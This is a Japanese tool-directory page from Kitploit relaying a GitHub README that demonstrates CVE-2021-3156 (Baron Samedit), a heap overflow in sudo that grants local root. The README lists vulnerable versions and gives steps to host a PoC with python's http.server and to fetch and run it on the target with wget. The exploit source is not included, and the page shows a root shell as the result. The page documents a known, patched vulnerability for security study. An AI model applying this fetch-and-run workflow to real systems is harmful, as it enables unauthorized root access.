Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Review.CVE-2021-3156 — CVE-2021-3156-エクスプロイト-デモ | Kitploit
ツール/GitHubGitHub/topskiypavelqwertygang/review.cve-2021-3156
特権昇格脆弱性分析エクスプロイトペネトレーションテストレッドチーミングバイナリエクスプロイト
GitHubtopskiypavelqwertygang/review.cve-2021-3156

Review.CVE-2021-3156

CVE-2021-3156-エクスプロイト-デモ

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
1年前未レビュー

👑 CVE-2021-3156 (Baron Samedit) — Privilege Escalation via Heap Overflow in sudo

📅 日付: 2025-06-08
✍️ 著者: @TopskiyPavelQwertyGang 🧠 セキュリティ研究者 | レッドチーム愛好家


🧠 CVE概要

  • CVE-ID: CVE-2021-3156
  • タイプ: ヒープベースのバッファオーバーフロー
  • コンポーネント: sudoedit (sudo)
  • アクセスレベル: ローカル
  • 目的: root権限の取得

🧠 説明

sudoedit におけるヒープオーバーフローにより、ローカルユーザーが事前に準備されたパラメータで sudoedit コマンドを実行することで root アクセスを取得できる可能性があります。

この脆弱性は、sudo < 1.9.5p2 のバージョンで悪用可能であり、Ubuntu/Debian/CentOS の一般的なイメージが含まれます。
ASLR が有効な場合でも、この脆弱性は悪用可能なままです。


🐾 悪用条件

root@kitploit:~
OS     : Ubuntu 20.04.3 LTS
glibc  : 2.31 (tcache ON)
sudo   : 1.8.31 (脆弱)
ASLR   : 2 (有効)

🧪 環境準備

  1. glibc と sudo のバージョンを確認:
root@kitploit:~
ldd --version
sudo --version
  1. 組み込み HTTP サーバーを介して別のマシンから PoC スクリプトを転送:
root@kitploit:~
python3 -m http.server 80
  1. ターゲットマシンで PoC をダウンロードして実行:
root@kitploit:~
wget http://<IP>:80/exploit_nss.py
python3 exploit_nss.py

🚀 PoC の悪用成功例

root@kitploit:~
$ python3 exploit_nss.py
# whoami
root

🧾 結論

CVE-2021-3156 の悪用は、ASLR が有効であっても、glibc ≥ 2.26 かつ sudo が脆弱なバージョンであれば可能です。
最も安定したエクスプロイトは exploit_nss.py であり、NSS 設定が正しければ初回で成功します。

🧨 システムは制御下にあります。


ツールをダウンロード